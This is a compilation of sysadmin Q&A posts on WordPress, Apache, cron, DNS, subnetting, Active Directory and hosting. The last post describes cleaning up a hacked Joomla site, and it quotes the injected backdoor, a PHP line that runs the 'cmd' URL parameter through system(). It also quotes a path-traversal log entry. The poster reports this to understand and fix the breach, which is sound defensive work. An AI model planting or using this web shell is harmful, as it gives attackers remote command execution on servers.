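One low-effort debugging step, assuming you can edit wp-config.php, is to turn on WordPress's own error logging so fatals are captured even when the page renders blank:

// in wp-config.php, above the "That's all, stop editing!" line
define( 'WP_DEBUG', true );
define( 'WP_DEBUG_LOG', true );      // writes to wp-content/debug.log
define( 'WP_DEBUG_DISPLAY', false ); // keep errors off the rendered page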



Update



It was the caching plugin W3 Total Cache that was causing the issue. Once I removed some of its core files, the site came back with the base theme and all plugins deactivated. Somehow the plugin was still causing major issues even when it was turned off; perhaps there were still details left in the database.




The reason why I did not see any PHP errors is not clear as of yet. I am still investigating this. I also got an xcache_get function error, but that is perhaps because XCache is not part of the PHP 5.3 package.


Answer



We see from your error log that your WordPress plugin is trying to call a function from XCache, but your new version of PHP doesn't include XCache.



To resolve the issue, install XCache for the new version of PHP.


Friday, April 21, 2017

How to serve Rails application with Passenger/Apache without domain name?

I am trying to serve a Rails application using Passenger and Apache on a Ubuntu server.



The Passenger installation instructions say I should add the following to my Apache configuration file - I assume this is /etc/apache2/httpd.conf.





<VirtualHost *:80>
    ServerName www.yourhost.com
    DocumentRoot /somewhere/public    # <-- be sure to point to 'public'!
    <Directory /somewhere/public>
        AllowOverride all             # <-- relax Apache security settings
        Options -MultiViews           # <-- MultiViews must be turned off
    </Directory>
</VirtualHost>



However, I do not yet have a domain pointing at my server, so I'm not sure what I should put for the ServerName parameter. I have tried the IP address, but when I do that, restarting Apache gives



apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[Sun Jan 17 12:49:26 2010] [error] VirtualHost *:80 -- mixing * ports and non-* ports with a NameVirtualHost address is not supported, proceeding with undefined results
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[Sun Jan 17 12:49:36 2010] [error] VirtualHost *:80 -- mixing * ports and non-* ports with a NameVirtualHost address is not supported, proceeding with undefined results


and pointing the browser at the IP address gives a 500 Internal Server Error.




The closest I have got to something sensible is with




<VirtualHost *:80>
    ServerName efate
    DocumentRoot /root/jpf/public
    <Directory /root/jpf/public>
        AllowOverride all
        Options -MultiViews
    </Directory>
</VirtualHost>




where "efate" is my server's host name. But now pointing my browser at the server's IP address just gives a page saying "It works!" - presumably this is a default page, but I'm not sure where this is being served from.



I might be wrong in thinking that the reason I have been unable to get this to work is related to not having a domain name. This is the first time I have used Apache directly - any help would be most gratefully received!

Does 31 necessarily imply the end of the month in a cron job?

For cron job we know we can set time as below.



# +------------ Minute (0 - 59)
# | +---------- Hour (0 - 23)

# | | +-------- Day of the Month (1 - 31)
# | | | +------ Month (1 - 12)
# | | | | +---- Day of the Week (0 - 7) (Sunday is 0 or 7)
# | | | | |
# * * * * * command


What I want to know is: when we set the day of the month to 31, does this mean the end of each month, even though some months do not have a day 31? (A workaround is sketched below.) Hope to get an answer.



Thanks in advance
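For reference, the answer is no: cron matches the literal day number, so a day-of-month of 31 never fires in months with fewer than 31 days. A common workaround, assuming GNU date, is to schedule days 28-31 and only run when tomorrow is the 1st (note that % must be escaped inside a crontab):

55 23 28-31 * * [ "$(date -d tomorrow +\%d)" = "01" ] && /path/to/command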

Nameservers for Open SRS - who is accountable for my domain?






I purchased the "release" of a domain from a domain provider who was also hosting the corresponding website.



I was given an account to log-in to at opensrs.net.



I pointed the domain to different nameservers to allow me to host it myself.






Now, several months later, the client received a domain renewal notice from the original domain provider. They advised the client to ignore the notice because payment was good until 2014. Days later, the domain was suspended, the nameservers were changed to RENEWYOURNAME.NET, and it has now gone into redemption, meaning it's unavailable for 40 days.



The original domain provider insists that they are no longer responsible for the domain.





Who is managing my domain? Who is payment due to? Who cancelled the account and changed the nameservers?



WHOIS data suggest that it's http://www.tucowsdomains.com/ who is a reseller of http://www.opensrs.com/.




Tucows Domains clearly identifies the original domain provider as the current provider. OpenSRS, through their control panel, identifies the same. The original domain provider denies responsibility.


Answer




Who is managing my domain?




From the sounds of it, nobody. According to whois, Tucows Domains is the registrar? Then Tucows Domains is the only company with permission to change the nameservers to "renewyourname.net".



Tucows isn't a reseller of OpenSRS, they own it - OpenSRS is the domain wholesale reselling branch of Tucows. Other companies then deal with registering domains and selling them to people and businesses.




So, are you a reseller with OpenSRS? What kind of username and password do you have there? It sounds like the original company gave you an end user login to their reseller account to manage your domain. I.e. the domain is still belonging to their account.



I don't think OpenSRS sell to end users directly. So if you have a reseller account where you pay OpenSRS for some domains and the domain is not in it, they haven't transferred it to you properly. If you don't have a reseller account, you aren't in a position to take ownership of the domain anyway and they can't have transferred it to you.



I guess the original registrant was an OpenSRS reseller, and they haven't handed the domain over to you at all, and are still responsible for it even though they think they aren't, and that OpenSRS is waiting on payment from them to make the domain live again.



Your argument is either to convince them that they haven't transferred it to you, or to get them to confirm with OpenSRS that they have and it hasn't worked.



http://www.tucowsdomains.com/management-and-passwords/findprovider/





The original domain provider denies responsibility.




There is a complaints and disputes procedure, but it doesn't look simple.



http://www.tucowsdomains.com/topic/disputes-and-complaints/



http://en.wikipedia.org/wiki/Domain_Name_System#Domain_name_registration




The organisation ICANN has the primary oversight of domain ownership on the internet, Tucows adhere to their lengthy dispute resolution protocols. But you aren't really disputing ownership - you and the original company agree who ought to own it, they are just being incompetent.


subnet - Subnetting Doubt

I have two PCs connected to a single switch. Default gateway is not configured for both.



PC1




IP Address - 10.3.0.1
Subnet Mask - 255.255.248.0



PC2



IP Address - 10.3.4.1
Subnet Mask - 255.255.252.0



Will they communicate (ping) with each other? As per my understanding, PC1 can ping PC2 successfully while PC2 cannot ping PC1, because PC1 is on a different network. Is that true? (See the worked ranges below.)




regards,
Abhilash
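Working the masks out shows the asymmetry the question is driving at:

PC1: 10.3.0.1/21 (255.255.248.0) -> treats 10.3.0.0 - 10.3.7.255 as on-link; PC2 falls inside this range
PC2: 10.3.4.1/22 (255.255.252.0) -> treats 10.3.4.0 - 10.3.7.255 as on-link; PC1 falls outside it

So PC1 will ARP for PC2 directly, but PC2 considers PC1 off-link and, with no default gateway configured, cannot send anything back. In practice even PC1's ping fails, because PC2 has no route on which to return the echo replies.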

Thursday, April 20, 2017

storage - How to connect SATA disks to copy large amounts of data from them to HP server running CentOS 6

We have an HP Proliant DL320e running CentOS 6.



We will get SATA hard disks with data in the formats NTFS, FAT, HFS and HFS+ from which we would like to copy the files to the server (read-only), preferably without having to reboot the server each time.



So some data supplier will mail us a hard disk, we connect it to the server, read the data, disconnect the hard disk and return the hard disk via mail. Each disk will have a few terabytes of data. We will simply copy it using cp -R or something similar. We currently assume the suppliers will not send us malicious data. The data will be written to a Synology RAID system that will be able to write the data much faster than we can read it from a single hard disk.




We have an HP RAID-controller "B120i" with several free slots, but probably we cannot use it to read non-raided disks sent to us by customers, correct?



Further we have an internal SATA connector that the seller intended to use to sell us an expensive DVD reader. We did not buy it so that SATA connector must be free.



Now the seller tells us that it is not possible to connect anything but the DVD-player to the internal SATA connector, and that our best option would be to connect the hard disks via USB instead. I have a feeling that USB will be slower than SATA.



Can we use the internal SATA connector, possibly with an extension cable?



Will we need any special drivers that are unavailable on CentOS, unless we connect the disks via USB?




What is the best way to get the data into the server?
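Whichever way the disks end up attached, the copy step itself is plain mounting; a sketch assuming the disk appears as /dev/sdb and the filesystem drivers are present (ntfs-3g from EPEL for NTFS; HFS+ support on CentOS 6 may need an extra kernel module):

mkdir -p /mnt/incoming
mount -t ntfs-3g -o ro /dev/sdb1 /mnt/incoming    # NTFS, read-only
# or: mount -t vfat -o ro /dev/sdb1 /mnt/incoming      # FAT
# or: mount -t hfsplus -o ro /dev/sdb2 /mnt/incoming   # HFS/HFS+
cp -R /mnt/incoming/. /path/to/synology/share/
umount /mnt/incoming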

Wednesday, April 19, 2017

Is there any difference between Domain controller and Active directory?



If I want to define "domain controller", then I would say a DC is where Active Directory is installed; or:

Active Directory simply means secure, centralized authentication and management,
and domain controller = AD DS + DNS.




But I get confused when I read here that:




I also think it is VERY EASY to say DOMAIN CONTROLLER == ACTIVE
DIRECTORY, which isn't quite the case.




I want to know: is that correct or wrong? If wrong, then what is the difference?


Answer




Just to put it another way that might be helpful is to say that Active Directory is a directory service for Windows domain networks and the Domain Controller is what serves that service on your Windows domain network. So, there is a difference between Active Directory and Domain Controller. One is the service, while the other is what serves that service.


windows server 2008 - DNS and DHCP addresses aren't matching up



Server 2008 R2 DNS and DHCP server (same server).



For some reason over the last few months I've noticed that many of my DNS entries are incorrect. I'll try to remote into a computer via hostname, and I end up at a different workstation than I intended. The only way to remotely find the correct IP is to check the hostname in DHCP and then update the DNS record to correct it.




Is there something I can do to fix this issue with my DNS without having to update each DNS entry manually? Even if I did that I think that this issue would continue to present itself.


Answer



You are likely having an issue with stale records that haven't been removed. Take a look into enabling Scavenging on your DNS zones, if you are utilizing dynamic DNS updates from your clients. Scavenging examines the records and will remove records that have not been updated in the specified time range. Here is some info on Scavenging Settings and how to enable it:



Enable Scavenging



DNS Aging and Scavenging


domain name system - Rewrite URL but have php read old URL




In my platform, each user has their own config file. The file is named by the subdomain they created.



Example:



user1.domain.com
user2.domain.com
user3.domain.com



The system reads the url via $_SERVER['SERVER_NAME'] and grabs the subdomain. It then looks up the appropriate config file based off of the subdomain.



Example:



If the URL is user1.domain.com, the system looks up user1.config.php.


Each user has the option to use their own domain. I am currently doing this by pointing the A record.



Example:




user 1 points theirDomainName.com to my IP address via their A record


How can I use .htaccess so the URL reads theirDomainName.com but the backend of the platform (PHP) reads user1.domain.com, so the platform knows to pull the user1 config file?


Answer



Instead of making rewrite rules in .htaccess, it would be much simpler to maintain by doing the mapping inside your PHP script.



That array should map the domain name to the username so you'll know how to do your include. If you're afraid of correcting the existing script beyond that, you could even update $_SERVER['SERVER_NAME'] based on it.




You could, for example, do:

$clients = ['domain1.com'=>'user1.domain.com',
    'domain2.com'=>'user2.domain.com',
    'domain3.com'=>'user3.domain.com'];

if (!array_key_exists($_SERVER['SERVER_NAME'], $clients)) {
    header('Location: http://domain.com/invalidclient');
    exit;
}

$_SERVER['SERVER_NAME'] = $clients[$_SERVER['SERVER_NAME']];


While it is not best practice to overwrite superglobals, nothing prevents it, and it gives you a really simple solution.


How can we measure the bandwidth for Ms Dynamics CRM?



We have to measure the bandwidth that MS Dynamics CRM uses. Does anybody know if there is an application for this, or another way through our server?
(Windows Server 2003 R2)


Answer



There is a nice article on http://blogs.iis.net




Measuring incoming and outgoing bandwidth per Application Pool




IIS has a per Web-Site performance counter that measures bandwidth ("Web Service", "Bytes Received/sec" and Web Service", "Bytes Sent/sec"). The problem is that this only measures the bandwidth for requests that make it to user mode. All requests that get cached by HTTP.SYS in kernel-mode will not be measured.
The good thing is that HTTP.SYS has the same performance counters ("HTTP Service Url Groups", "BytesReceivedRate" and "HTTP Service UrlGroups", "BytesSentRate").




The blog post also contains a PowerShell script that creates a nice output of bandwidth usage of each application pool.
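For a quick look without the script, the per-site counters can also be sampled with the built-in typeperf tool (present on Server 2003 R2); this polls the totals every 5 seconds, 12 times:

typeperf "\Web Service(_Total)\Bytes Sent/sec" "\Web Service(_Total)\Bytes Received/sec" -si 5 -sc 12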


Tuesday, April 18, 2017

amazon ec2 - Can i run multiple web apps on a single EC2 instance

I need to lower my AWS costs and am looking for ways to reduce my AWS usage. I currently have a single Java/Tomcat webapp which I run multiple EC2 instances of, with different configurations. I have siteone.com and sitetwo.com, each with their own EC2 instances under the same Elastic Beanstalk environment. These instances are load balanced (I am thinking of removing load balancing for cost), and they both require SSL and connections to an RDS instance. They are both currently in the same VPC. To reduce my costs I need to reduce my instances. How can I go about running multiple Tomcat web apps on a single EC2 instance (one approach is sketched below)? I am the sole dev on this and could use some direction. Thanks!
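One common consolidation pattern, sketched here as a possibility rather than a drop-in config for this exact setup, is a single Tomcat with one Host per site in conf/server.xml, so both apps share one EC2 instance:

<!-- inside the <Engine> element of conf/server.xml -->
<Host name="siteone.com" appBase="webapps-siteone" unpackWARs="true" autoDeploy="true"/>
<Host name="sitetwo.com" appBase="webapps-sitetwo" unpackWARs="true" autoDeploy="true"/>

Each appBase directory would hold that site's application deployed as ROOT.war, and SSL for both names can terminate either on the same connector or on a front-end proxy.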

Monday, April 17, 2017

amazon web services - elastic ip addresses and cost

I always understood that you can have one IP for free, and then you start paying for them. Also, it has to be associated.




But I need another one for my mail server, and after reading their documentation word for word, I read it as: per instance.

Is that true? Can I have up to 5 Elastic IP addresses for free as long as they are associated with my instances?




You can have one Elastic IP (EIP) address associated with a running instance at no charge. If you associate additional EIPs with that instance, you will be charged for each additional EIP associated with that instance per hour on a pro rata basis. Additional EIPs are only available in Amazon VPC.


domain name system - How can I verify Windows DNS forwarders are working?

I thought I knew how to do this, but I guess not.



Even the d2 debugging in nslookup doesn't show the actual forwarder being queried.



So... let's say I set up DNS forwarders on a Windows DNS server and then query that server, using nslookup (or something else?), for an external FQDN like "www.purpleflowers.com".



Can I actually see where the Windows DNS server is querying its forwarder, which forwarder it ended up using, and the response from that forwarder?
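One way to get exactly that visibility is the DNS server's own debug log rather than the client side. On Server 2012 or later it can be enabled from PowerShell (earlier versions expose the same options on the Debug Logging tab of the server's properties in the DNS console):

Set-DnsServerDiagnostics -Queries $true -Answers $true -SendPackets $true -ReceivePackets $true -SaveLogsToPersistentStorage $true

The resulting packet log records each query the server sends upstream and the forwarder's response, which answers all three of the questions above.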

Sunday, April 16, 2017

Postfix: Gmail marking my email as spam

I've been trying to understand why Gmail is treating the email sent from one of my domains/servers as SPAM. I found a lot of threads here about this issue; however, I checked the usual suspects like domain keys, SPF etc.




My email is accepted by Outlook.com, which from my understanding has a much more aggressive spam filter.



I tested my config using auth-results@verifier.port25.com and I got this:



SPF check:          pass
DomainKeys check: neutral
DKIM check: pass
Sender-ID check: pass
SpamAssassin check: ham



Everything looks fine.



After sending an email to a gmail account I get this under the headers:



Received-SPF: pass (google.com: domain of user@mydomain.org designates 89.x.x.8 as permitted sender) client-ip=89.x.x.x;
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of user@mydomain.org designates 89.x.x.8 as permitted sender) smtp.mail=user@mydomain.org;
dkim=pass header.i=@mydomain.org



As you can see, the email is passing on spf and dkim without issues on gmail servers.



Finally I checked my server IP, hostname and domain at http://mxtoolbox.com/blacklists.aspx for RBL blocks and they're not listed anywhere.



Why is Gmail treating my emails as SPAM? It makes no sense; I've complied with every single good practice.



Other Note:





  • Reverse DNS is also ok;

  • Tests at http://www.allaboutspam.com are green, except for "Email server is not using BATV format";



Thank you.




SPF TXT records - do I need to include sub domains for an outsourced sender SPF record



Say that I want to send mail from my own servers at example.com.



As I understand it, I can specify the following SPF record and have any server addressed by an A record under example.com included by the SPF record. So evaluation of mail sent from mailserver1.example.com, mailserver2.example.com would result in a pass:



v=spf1 a ~all



If however I am using an outsourced mail sender say wesendmail.com, I would use an SPF record like this:




v=spf1 include:wesendmail.com ~all



My main question is - If wesendmail.com sends mail from servers at mailserver1.wesendmail.com, mailserver2.wesendmail.com, do I need to include additional SPF records for these servers, or are they captured by the above SPF record?



Also, if I do need to include additional records, how would I find out what their mail servers are? NSLOOKUP zone transfer attempts are blocked by most DNS servers.


Answer



The include clause in your SPF record fetches the corresponding SPF record from wesendmail.com and includes that in-line in your record. So assuming that wesendmail configures their record correctly, you don't need to do anything further.
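To see exactly what that include pulls in, query the published record yourself, for example:

dig +short TXT wesendmail.com

Whatever v=spf1 record comes back is what is evaluated inside your include:, and any include: directives it in turn contains are followed recursively, so individual mail server hostnames never need to appear in your own record.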


Saturday, April 15, 2017

centos - kernel patch .diff file



I need to apply a .diff patch file to the kernel. How do I apply it; which command should I use after I save the patch to patch.diff?
PS: the patch is
https://bugzilla.redhat.com/show_bug.cgi?id=248716


Answer




You can use the patch tool. The general syntax is as follows:



patch -pnum < patchfile


For more info see:



man patch
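For a kernel tree the typical invocation, assuming the diff was generated one directory level above the source root (hence -p1), looks like:

cd /usr/src/linux
patch -p1 --dry-run < ~/patch.diff   # test that it applies cleanly first
patch -p1 < ~/patch.diff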

apache 2.2 - PHP file download sometimes

I have a little problem with my Apache CentOS server with PHP 5.0 and MySQL. When I open multiple files, sometimes it serves the .php pages as downloads. I think PHP has a problem, because it happens only when I open many browser windows (like 30). How can I solve this issue?

ubuntu - Apache2 proxy preserve domain name

I'm trying to implement the scheme Browser Client -> Apache2 Proxy -> Tomcat Application Server, with Apache2 and Tomcat on separate servers. But the proxy does not work as I expected.

Apache2 virtual host setting:



  
<VirtualHost *:80>
    ServerName example.com
    ServerAlias www.example.com

    ProxyPass /MyApp http://tomcatdomain.com/MyApp
    ProxyPassReverse /MyApp tomcatdomain.com/MyApp
</VirtualHost>




If I make a request to open the page in the browser, http://example.com/MyApp, the application opens correctly, but the URL is different: http://tomcatdomain.com/MyApp.
Next, I look at the Ajax request and see that it does not work according to the scheme I expected:



 12:35:20.537 GET https://example.com/MyApp/service/test [HTTP/1.1 302  41ms]
12:35:20.617 GET https://tomcatdomain.com/MyApp/service/test


Expected: [request] client->apache2->tomcat [response] tomcat->apache2->client




Actually: [request] client->apache2 [response] apache2->client [request2] client ->tomcat [response2] tomcat -> client



My first question is: how do I make the client receive a response from Tomcat with a single request?



The next problem is with the ProxyPreserveHost parameter: I need to keep the original URL (example.com) when opening the application (not tomcatdomain.com). I appended ProxyPreserveHost to the Apache2 settings:




<VirtualHost *:80>
    ServerName example.com
    ServerAlias www.example.com

    ProxyPreserveHost On

    ProxyPass /MyApp http://tomcatdomain.com/MyApp
    ProxyPassReverse /MyApp tomcatdomain.com/MyApp
</VirtualHost>



I also prepared the Tomcat server.xml:



   

www.example.com




I make a request and what I see in the browser:



The page isn’t redirecting properly
Firefox has detected that the server is redirecting the request for this address in a way that will never complete.




I make an AJAX request and I see 22 identical requests that are not answered:



 12:54:48.020 GET https://example.com/MyApp/service/test [HTTP/1.1 302  28ms]
12:54:48.042 GET https://example.com/MyApp/service/test [HTTP/1.1 302 4ms]
... 22 requests!
12:54:48.367 GET https://example.com/MyApp/service/test [HTTP/1.1 302 3ms]


I conclude that the request is not redirected to the tomcat server.




To confirm my guesses, I corrected the Apache2 settings:



  
<VirtualHost *:80>
    ServerName example.com
    ServerAlias www.example.com

    ProxyPreserveHost On

    ProxyPass /MyApp http://tomcatdomain.com/MyApp**ABCD**
    ProxyPassReverse /MyApp tomcatdomain.com/MyApp**ABCD**
</VirtualHost>




And in the browser I see:
Not Found
The requested URL /MyAppABCD was not found on this server.
Apache/2.4.27 (Ubuntu) Server at example.com Port 80



Does Apache2 search for the URL mapping not on Tomcat, but on the same Apache2?




Tell me, please, how to implement the scheme where, when the browser opens the page, the data is received from Tomcat via the Apache2 proxy and the original URL is preserved? Thanks.

Friday, April 14, 2017

Migrating DHCP from one server and subnet to another, one subnet fails to retrieve addresses

I just attempted to migrate the DHCP service from a 2008 R2 server on vlan1 to a 2012 R2 server on vlan20. We had the DHCP helpers assigned on the core switch and firewall DHCP relays set up for any VLANs that required them. After the move, the devices on vlan1, the same VLAN as the old server, could not get an IP address. All other VLANs were able to retrieve addresses from the new server.



My migration process used PowerShell commands to back up DHCP, including leases, from the old server and import them on the new server. Once the new server finished the import, I deauthorized the old server on vlan1 and authorized the new server on vlan20. The old server remained on, as it is still used for other server roles.





  • When the devices on vlan1 failed to retrieve addresses, I also disabled DHCP Server in services.msc.

  • I could ping the servers from either vlan.



My WAN person asked, "Did you shut off DHCP on the old one completely? It's on the VLAN and everything will look locally first b4 going through the Relay". Shouldn't deauthorizing and/or stopping the service be enough, or would there be more to do?



Any ideas what went wrong?



--Edit/Update--

While the relays were set up correctly and the migration process used was correct, if I recall correctly there was a global relay setting that was preventing vlan1 from finding the relay on the new VLAN. Thanks for the input.

domain name system - Microsoft DNS behaving strangely

I'm having this peculiar issue with Microsoft DNS.



Basically, we have domain.com in a split-horizon setup (the external public DNS and the internal DNS are both authoritative, for separate zones); don't ask me why, it was like this when I got here.



In this AD we have 3 domain controllers serving as DNS servers for the internal zones. On top of this, we have 2 DNS servers that forward queries to these AD servers and cache the results.




Additionally, we have another domain, example.com that's only in our external public DNS servers.



Now to the problem: the AD servers have taken issue with the name subdomain.example.com. They return "domain name can't be found", as an authoritative server does when it doesn't have a record. However, the DNS forwarders used by clients do resolve the query.



Externally everything works fine; subdomain.example.com resolves, as it should, to a CNAME for www3.domain.com.



However, the problem is not with the whole zone, it's only with that specific subdomain. www.example.com resolves both internally and externally as a CNAME for www3.domain.com.



So, how can a DNS server that's not authoritative for a zone reply that a record can't be found?




As a workaround, I created a new zone for subdomain.example.com and added an A record that's identical with the one for www3.domain.com. And an hour later this record was gone?
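
Two hedged checks that may narrow this down: query each DC directly, bypassing the forwarders, and enumerate the zones each DC actually hosts, since a stray or stub zone named example.com on a DC would make it answer authoritatively with "name not found" (the DC name below is a placeholder):

rem Ask one DC directly, bypassing the caching forwarders.
nslookup -type=CNAME subdomain.example.com dc1.domain.com

rem List every zone this DC hosts; look for example.com or a child of it.
dnscmd dc1.domain.com /EnumZones

If the workaround zone was created as an AD-integrated zone, it is also worth checking whether another DC held a conflicting copy, since AD replication conflict handling can make manually added zones and records appear to vanish.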



I'm close to giving up and becoming a goat farmer. :)

Thursday, April 13, 2017

windows - Remote Desktop Clipboard Sharing - Security Risk?



If I connect to a server with RDP and share my clipboard with the server, are there any security risks of my clipboard being available to other people logging onto the same server?



e.g.




  1. I have a password saved in my local clipboard


  2. I connect to the server "example.com" using Remote Desktop, username "administrator".

  3. My local password is now available to paste into the remote desktop session.

  4. I close the RD window without logging off.

  5. Another user logs on via RDP without clipboard sharing enabled or on the actual machine itself as "administrator".

  6. Under normal conditions is my password available for the other user to paste?



My above question assumes there is nothing installed on the server that will grab clipboard entries and save them, beyond what is supplied with Windows as standard. I realise that if I connected to an untrusted or compromised server with clipboard sharing enabled, all bets are off. I am asking whether Windows has a built-in mechanism to clear the shared clipboard upon disconnection.


Answer



I just tried it using the regular RDP client against a Windows Server guest. With clipboard sharing off, the shared clipboard is "cleared" when a user connects to the guest. With clipboard sharing enabled on connection, it uses the contents of the connecting user's clipboard.




So, there is no security risk in allowing shared clipboards.
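
That said, if you want to be defensive anyway, you can overwrite the shared clipboard from inside the session just before disconnecting; a minimal sketch using only built-in tools, from a cmd prompt in the session:

:: "echo off" produces no output, so clip receives an empty stream
:: and the clipboard ends up empty.
echo off | clip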


Tuesday, April 11, 2017

hosting - MySQL database host



Like there's "shared website host", I hope there's a database host.
It's like getting an IP, user name and password and just connecting to that database.




I think that would be better than trying to set up such a server myself - renting a dedicated server and configuring the software is prone to many errors.



So I'm looking for a company that takes this seriously and has a cluster of MySQL servers (for reliability) from which I can rent an allocation.



Oh, and I'm looking for this service in Europe.


Answer



I know such services exist for MongoDB, but a remote MySQL setup like that would add a lot of latency to your application. It might not be worth it.
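
If you do go down that road, it's worth measuring the cost first. A rough sketch (host name and credentials are placeholders):

# Wall-clock time for a trivial query against the remote host.
time mysql -h db.example-host.eu -u appuser -p -e 'SELECT 1;'

# Raw network round-trip time, for comparison.
ping -c 5 db.example-host.eu

A typical page view issues dozens of queries, so the per-query round trip multiplies quickly.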


Monday, April 10, 2017

email - Sendmail Spamming Recipient

I am using a Perl script to send a daily status email to my Gmail account.
For some reason, sendmail seems to be spamming Gmail although I am only sending one email.
Gmail complains about a failed verification, which seems to trigger delivery attempts to the alternate relays. Since all relays point to the same account, this raises a spam flag ("... receiving mail at a rate ...").



This problem is tied to the sending host, since sending emails to the same recipient from another host goes through right away.

The recipient eventually (a few hours later) gets 5 copies of the original email.

Note: Using Postfix instead of sendmail works.

Can anybody point me towards a solution?



Mar 23 07:00:01 myhostname /USR/SBIN/CRON[16720]: (root) CMD (perl /root/daily-check.pl^I)
Mar 23 07:00:01 myhostname /USR/SBIN/CRON[16721]: (smmsp) CMD (test -x /etc/init.d/sendmail && /usr/share/sendmail/sendmail cron-msp)
Mar 23 07:00:01 myhostname sendmail[16742]: r2N601Va016742: from=root@myhostname.isp.net, size=445, class=0, nrcpts=1, msgid=<201303230600.r2N601Va016742@localhost.localdomain>, relay=root@localhost
Mar 23 07:00:01 myhostname sm-mta[16743]: r2N6012b016743: from=<root@myhostname.isp.net>, size=680, class=0, nrcpts=1, msgid=<201303230600.r2N601Va016742@localhost.localdomain>, proto=ESMTP, daemon=MTA-v4, relay=localhost.localdomain [127.0.0.1]
Mar 23 07:00:01 myhostname sendmail[16742]: r2N601Va016742: to=myaccount@gmail.com, ctladdr=root@myhostname.isp.net (0/0), delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30445, relay=[127.0.0.1] [127.0.0.1], dsn=2.0.0, stat=Sent (r2N6012b016743 Message accepted for delivery)

Mar 23 07:00:02 myhostname sm-mta[16745]: STARTTLS=client, relay=aspmx.l.google.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:02 myhostname sm-mta[16745]: r2N6012b016743: to=<myaccount@gmail.com>, ctladdr=<root@myhostname.isp.net> (0/0), delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=120680, relay=aspmx.l.google.com. [IPv6:2a00:1450:4001:c02::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
Mar 23 07:00:03 myhostname sm-mta[16745]: STARTTLS=client, relay=alt1.aspmx.l.google.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:03 myhostname sm-mta[16745]: r2N6012b016743: to=<myaccount@gmail.com>, ctladdr=<root@myhostname.isp.net> (0/0), delay=00:00:02, xdelay=00:00:02, mailer=esmtp, pri=120680, relay=alt1.aspmx.l.google.com. [IPv6:2a00:1450:4010:c03::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
Mar 23 07:00:04 myhostname sm-mta[16745]: STARTTLS=client, relay=alt2.aspmx.l.google.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:04 myhostname sm-mta[16745]: r2N6012b016743: to=<myaccount@gmail.com>, ctladdr=<root@myhostname.isp.net> (0/0), delay=00:00:03, xdelay=00:00:03, mailer=esmtp, pri=120680, relay=alt2.aspmx.l.google.com. [IPv6:2607:f8b0:400e:c00::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
Mar 23 07:00:05 myhostname sm-mta[16745]: STARTTLS=client, relay=aspmx3.googlemail.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:06 myhostname sm-mta[16745]: r2N6012b016743: to=<myaccount@gmail.com>, ctladdr=<root@myhostname.isp.net> (0/0), delay=00:00:05, xdelay=00:00:05, mailer=esmtp, pri=120680, relay=aspmx3.googlemail.com. [IPv6:2607:f8b0:400e:c00::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
Mar 23 07:00:07 myhostname sm-mta[16745]: STARTTLS=client, relay=aspmx2.googlemail.com., version=TLSv1/SSLv3, verify=FAIL, cipher=RC4-SHA, bits=128/128
Mar 23 07:00:07 myhostname sm-mta[16745]: r2N6012b016743: to=<myaccount@gmail.com>, ctladdr=<root@myhostname.isp.net> (0/0), delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=120680, relay=aspmx2.googlemail.com. [IPv6:2a00:1450:4010:c03::1b], dsn=4.2.1, stat=Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
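
For what it's worth, one hedged workaround is to stop sm-mta from walking Gmail's MX list itself and instead hand everything to the ISP's relay as a smarthost. In sendmail.mc that is roughly (the relay name is a placeholder):

dnl Route all outbound mail through the ISP relay instead of
dnl contacting the Gmail MX hosts directly.
define(`SMART_HOST', `relay.isp.net')dnl

followed by regenerating sendmail.cf from sendmail.mc (for example with m4, or sendmailconfig on Debian) and restarting sendmail. This is a sketch of a workaround, not a root-cause fix for the verify=FAIL itself.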

security - Site Hacked Using ?cmd=ls




A Joomla site I'm running was hacked the other day. The hacker dropped some files into the tmp directory and was somehow running an HTTP daemon there (at least that's what my host told me). At any rate, I've been trying to clean up the files they left behind and secure what I can, but in checking my logs I noticed a hit on www.domain.com/?cmd=ls. This seemed strange to me, so I tried it... and lo and behold, it lists all the files in the root directory of my site. Can someone explain why this is happening and how to stop it? This seems like a huge exploit, which I'd like to eliminate immediately.



Update: In digging I noticed a few extra lines added to my Joomla index.php:



if ($_GET['cmd']!=null) {
system($_GET['cmd']);
}


I've removed these, but am curious to know how the attacker managed to edit these to begin with. Not really sure where to look to make sure I've closed any back doors.




More Updates: First let me say that yes, I realize the proper course of action here is to blow the site away and restore from backup. However I'd prefer to leave that as a last resort since (a) it's a site that depends on community contributions and my backups aren't that recent (my fault, I know) and (b) I'm working on a new version that should be ready soon. But since I seem to be getting some assistance here I'll add some of the other things that I found/did in an attempt to fix this situation.



Found some .kin (or something like that - didn't make note of it and deleted it right away) directory in my /tmp folder which was obviously where this http daemon was running from. I'm assuming that the gunzip (mentioned below) was how this was placed here.



In my error_log files I found the following suspect entries (the "..." is my attempt to remove the path/filenames from this post):



[04-Jul-2010 09:45:58] PHP Fatal error:  Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in ... on line 24

[05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in ... on line 92


[04-Jul-2010 06:41:52] PHP Warning: rmdir(...) [function.rmdir]: Directory not empty in ... on line 1719


I've updated the CKForms component (which was listed as having a known exploit with the version I was running), as well as another component listed in the HTTP_USER_AGENT message.



In my stat logs I found that the same IP address attempted the ?cmd=ls twice, so I blocked that IP (somewhere in Indonesia).



I updated my Joomla installation to the latest.




I found system.ph and system.php files in my root which had a gunzip/base64 encoded string, which I deleted.



I've gone through all of the directories within the installation where the timestamp is recent to see if any abnormal files exist.



